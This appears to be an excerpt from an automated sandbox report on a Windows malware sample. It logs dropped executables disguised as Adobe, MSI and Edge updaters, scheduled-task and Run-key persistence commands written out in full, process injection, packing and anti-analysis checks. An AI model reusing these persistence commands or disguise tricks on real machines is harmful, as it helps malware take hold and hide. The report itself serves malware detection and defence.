Source: unknown Process created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe "C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe "C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Section loaded: apphelp.dll Jump to behavior
Source: EdgeMS2.lnk.0.dr LNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exe Static file information: File size 3764472 > 1048576
Source: file.exe Static PE information: Raw size of .vmp is bigger than: 0x100000 < 0x370a00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Unpacked PE file: 7.2.zy4GXi5yvCrsiS0ulH8Z.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 9.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 11.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Unpacked PE file: 14.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe Unpacked PE file: 21.2.hcMSmyGUCSEFc2FAKlzc.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Unpacked PE file: 22.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Unpacked PE file: 23.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 24.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Unpacked PE file: 25.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 27.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Unpacked PE file: 28.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Unpacked PE file: 29.2.EdgeMS2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BAB380 WriteProcessMemory,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 0_2_00BAB380
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .vmp
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name: .vmp
Source: file.exe Static PE information: section name: .vmp
Source: file.exe Static PE information: section name: .vmp
Source: l2[1].exe.0.dr Static PE information: section name: .MPRESS1
Source: l2[1].exe.0.dr Static PE information: section name: .MPRESS2
Source: zy4GXi5yvCrsiS0ulH8Z.exe.0.dr Static PE information: section name: .MPRESS1
Source: zy4GXi5yvCrsiS0ulH8Z.exe.0.dr Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe.0.dr Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe.0.dr Static PE information: section name: .MPRESS2
Source: k[1].exe.0.dr Static PE information: section name: .MPRESS1
Source: k[1].exe.0.dr Static PE information: section name: .MPRESS2
Source: hcMSmyGUCSEFc2FAKlzc.exe.0.dr Static PE information: section name: .MPRESS1
Source: hcMSmyGUCSEFc2FAKlzc.exe.0.dr Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: oobeldr.exe.7.dr Static PE information: section name: .MPRESS1
Source: oobeldr.exe.7.dr Static PE information: section name: .MPRESS2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DE42B3 push 21A73256h; iretd 0_2_00DE4329
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C96261 push cx; ret 0_2_00C96271
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFE7E9 push ecx; ret 0_2_00AFE7FC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C72B21 push ecx; ret 0_2_00C72B34
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D56C98 push eax; iretd 0_2_00D56CE3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D78D67 push ds; retf 0_2_00D78D89
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA0ED1 push es; retf 0_2_00DA0F93
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CEB30A push edi; ret 0_2_00CEB317
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CF55AC push cs; retf 0_2_00CF5577
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CEDCCE push ebp; ret 0_2_00CEDCDC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CEDC78 push ebp; ret 0_2_00CEDCDC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B0DEC3 push ebp; ret 0_2_00B0DF05
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0716C245 push esi; ret 0_2_0716C24E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07145B83 push ecx; ret 0_2_07145B96
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Code function: 7_2_006D50A5 push ebp; ret 7_2_00721C57
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 1630005 value: E9 2B BA 88 75 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 76EBBA30 value: E9 DA 45 77 8A Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 1640008 value: E9 8B 8E 8C 75 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 76F08E90 value: E9 80 71 73 8A Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 3250005 value: E9 8B 4D 82 72 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 75A74D90 value: E9 7A B2 7D 8D Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 3260005 value: E9 EB EB 82 72 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 75A8EBF0 value: E9 1A 14 7D 8D Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 3270005 value: E9 8B 8A BE 72 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 75E58A90 value: E9 7A 75 41 8D Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 3280005 value: E9 2B 02 C0 72 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: PID: 3580 base: 75E80230 value: E9 DA FD 3F 8D Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07137890 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_07137890
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Contains functionality to implement multi-threaded time evasion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0712C230 CreateThread,Sleep, call eax 0_2_0712C230
Found stalling execution ending in API Sleep call
Source: C:\Users\user\Desktop\file.exe Stalling execution: Execution stalls by calling Sleep
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CBA212 rdtsc 0_2_00CBA212
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 8126 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 676 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 437 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Window / User API: threadDelayed 9995 Jump to behavior
Found decision node followed by non-executed suspicious APIs
Source: C:\Users\user\Desktop\file.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found evasive API chain (date check)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 10.0 %
May sleep (evasive loops) to hinder dynamic analysis
